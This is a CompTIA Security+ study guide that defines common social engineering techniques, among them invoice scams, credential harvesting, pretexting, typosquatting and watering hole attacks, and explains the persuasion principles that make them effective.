Social Engineering Techniques | CompTIA Security+ SY0-601 | 1.1b

In this video you will learn about social engineering techniques such as: prepending, identity fraud, invoice scams, credential harvesting, reconnaissance, hoax, impersonation, watering hole attack, typosquatting, pretexting, influence campaigns, & principles pertaining to reasons for effectiveness.

Prepending

Prepend is a word that means to attach content as a prefix.  It is often used in different kinds of programming and in automated processes.  Some prepending is done manually as a user.  For example, a prepend command could be used in scripting language that a programmer would enter into a certain function or code module.  It would add certain characters of text to the beginning of some variable or object.  Other kinds of prepending are automated.^[1]  You can configure email servers or email cloud services to prepend a message in the email subject line to identify emails that are coming from outside of the organization.^[2]

Identity Fraud

Identity theft occurs when an assailant impersonates you for their own gain using stolen information that is often used to identify you (social security number, address, etc.).  Examples of some of the nefarious actions that may be carried by a criminal using your identity include:^[3]

• Opening bank or credit accounts tied to you
• Filing a bogus tax return and collecting your refund
• Making online purchases, sometimes with the intention of selling goods on the black market
• Claiming your identity to shift medical expense liability (medical identity theft)

Invoice Scams

Invoice scams are when scammers send unsolicited emails and other messages to victims that include an “invoice” (as a malicious attachment) for something that they have not purchased.  For instance, a scammer might send you a targeted email message including an invoice for something that you most likely have purchased in the past.  The scammer may look for information about you and then send a targeted email with such an invoice.^[2]  Typically, these scams work in three steps:

1. Phishers attempt to find contracts and names of suppliers providing goods to a particular company
2. They impersonate a legitimate supplier and send bills to subordinate personnel
3. They try to solidify their efforts by sending fake letters that claim to come from the actual supplier’s designated bank

Fake invoice scams take advantage of the fact that the average email user or someone handling administrative tasks for a business (or personal affairs) may not know whether any product or service has actually been purchased.^[4]

Credential Harvesting

Credential harvesting (password harvesting) is the process of gathering valid usernames, passwords, private emails, & email addresses through infrastructure breaches.  The possible motivations for such a breach are many:  the hackers could sell delicate personal & financial data on the dark web; gain access to a company network for purposes of corporate espionage and steal IP or other assets; or use the data to embezzle money.  A commonly cited source of credential harvesting is the use of phishing emails.  These emails contain an attachment encoded with a hyperlink that, when clicked, uploads data-stealing programs onto your console.  While phishing emails are the most common avenue, credential harvesting can also be performed by malware viruses, cloned website links, the use of unsecure third party vendors, and ransomware.  In many cases, the breached user often has no knowledge that the malicious attack has even occurred.^[5]

Reconnaissance

In the context of cybersecurity, reconnaissance is the practice of covertly discovering & collecting information about a system.  This method is often used in ethical hacking or penetration testing.  Reconnaissance generally follows seven steps:

1. Collect initial information
2. Determine the network range
3. Identify active machines
4. Find access points & open ports
5. Fingerprint the operating system
6. Discover services on ports
7. Map the network

Using these steps, an attacker will aim to gain the following information about a network:

• File permissions
• Running network services
• OS platform
• Trust relationships
• User account information

One of the most common techniques involved with reconnaissance is port scanning, which sends data to various TCP & UDP ports on a device and evaluates the response.^[6]

Hoax

A hoax is the attempt at deceiving people into believing something that is false.  The differences between hoaxes & phishing can be quite gray.  However, hoaxes can come in person or through other means of communication, whereas phishing is generally relegated to e-communication & phone.  Although phishing can occur at any time, and with the specific goal of obtaining private information, a hoax can often be perpetuated on holidays or other special days and could be carried out simply for fun.  Regardless, hoaxes can use up valuable organization resources such as email replies, Internet bandwidth usage, time spent, etc.^[2]

Impersonation

Impersonation is a form of fraud in which attackers pose as a known or trusted person to dupe an employee into transferring money to a fraudulent account, sharing sensitive information (such as intellectual property, financial data or payroll information), or revealing login credentials that attackers can use to hack into a company’s computer network.  CEO fraud, business email compromise and whaling are specific forms of impersonation attacks where malicious individuals pose as high-level executives within a company.  Impersonation attacks are typically malware-less attacks conducted through email using social engineering to gain the trust of a targeted employee.  Attackers may research a victim online, gathering information from social media accounts and other online sources which, when used in the text of an email, can lend authenticity to the message.^[7]

Watering Hole Attack

Watering hole is a computer attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware.  Eventually, some members of the targeted group will become infected.^[8]  Hacks looking for specific information may only attack users coming from a specific IP address.  This also makes the hacks harder to detect and research.^[9]

Typosquatting

Typosquatting (URL hijacking or fake URL) is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typos made by Internet users when inputting a website address into a web browser.  Should a user accidentally enter an incorrect website address, they may be led to any URL (including an alternative website owned by a cybersquatter).^[10]  The typosquatter’s URL will usually be one of five kinds, all similar to the victim site address:

• A common misspelling, or foriegn language spelling, of the intended site
• A misspelling based on a typographical error
• A plural of a singular domain name
• A different top-level domain (.com instead of .org)
• An abuse of the Country Code Top-Level Domain (.cm, .co, or .om instead of .com)

Once in a typosquatter’s site, the user may also be tricked into thinking that they are in fact in the real site, through the use of copied or similar logos, website layouts, or content.  Spam emails sometimes make use of typosquatting URLs to trick users into visiting malicious sites that look like a given bank’s site.

Pretexting

Pretexting is a type of social engineering attack that involves a situation, or pretext, created by an attacker in order to lure a victim into a vulnerable situation and to trick them into giving private information, specifically information that the victim would typically not give outside the context of the pretext.^[11]  In its history, pretexting has been described as the first stage of social engineering, and has been used by the FBI to aid in investigations.^[12]  A reason for pretexting’s prevalence among social engineering attacks is its reliance on manipulating people in order to gain access to the information the attacker wants, versus having to hack a technological system.  When looking for victims, attackers can watch out for a variety of characteristics, such as ability to trust, low perception of threat, response to authority, and susceptibility to react with fear or excitement in different situations.^[13]

Influence Campaigns

• Hybrid Warfare:  A subject originally employed by the armed forces.  However, attackers use hybrid warfare techniques in cyber & influential campaigns to manipulate people to believe something that may not be true by using different types of propaganda that are often shared in social media sites.
• Social Media:  Threat actors use automated bots in social media sites like Twitter & Facebook to influence the sentiment of a given user.  These bots are used to try to manipulate public sentiment on contentious issues including political events, gun control, abortion, etc.^[2]

Principles (Reasons for Effectiveness)

The following are several motivation techniques used by social engineers:^[2]

• Authority:  A social engineer shows confidence & perhaps authority – whether legal, organizational, or social authority.
• Intimidation:  Attackers can use intimidation to manipulate their victims to perform some action or to reveal sensitive information.
• Consensus:  “Social proof”, is a psychological phenomenon in which an individual is not able to determine the appropriate mode of behavior.  For example, you might see others acting or doing something in a certain way & might assume that it is appropriate.  Social engineers might use this tactic when an individual enters an unfamiliar situation that he or she doesn’t know how to deal with.  Social engineers might manipulate multiple people at once by using this technique.
• Scarcity:  It is possible to use scarcity to create a feeling of urgency in a decision-making context.  Specific language can be used to heighten urgency & manipulate victims.  Salespeople often use scarcity to manipulate clients by telling a customer that an offer is for today only or that there are limited supplies.  Social engineers use similar techniques.
• Familiarity:  Individuals can be influenced by things or people they like or are familiar with.  Social engineers take advantage of these human vulnerabilities to manipulate their victims.
• Trust:  Attackers take advantage of the trust a person has in another person or organization in order to influence them to perform some action or reveal sensitive information.
• Urgency:  It is possible to manipulate a person with a sense of immediate urgency to prompt him or her to act promptly.  Using urgency, social engineers force their victims to act quickly to avoid or rectify a perceived dangerous or painful situation.